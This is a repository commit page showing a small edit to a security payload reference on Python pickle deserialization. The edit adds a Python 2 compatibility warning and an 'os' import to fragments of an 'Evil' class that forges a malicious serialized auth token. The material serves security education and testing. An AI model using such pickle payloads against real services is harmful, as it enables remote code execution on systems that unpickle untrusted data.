ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-20 13:46:05 +00:00
Code Issues Actions 1 Packages Projects Releases Wiki Activity

Merge pull request #486 from nerrorsec/patch-1

Browse Source 
import os
This commit is contained in:
Swissky 2022-04-18 20:58:40 +02:00 committed by GitHub
commit 4ea77223bb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
Insecure Deserialization/Python.md
View File

@ -3,6 +3,7 @@
## Pickle
The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
:warning: `import cPickle` will only work on Python 2
```python
import cPickle
@ -32,7 +33,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
```python
import cPickle
import cPickle, os
from base64 import b64encode, b64decode
class Evil(object):
@ -47,4 +48,4 @@ print("Your Evil Token : {}").format(evil_token)
## References
* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)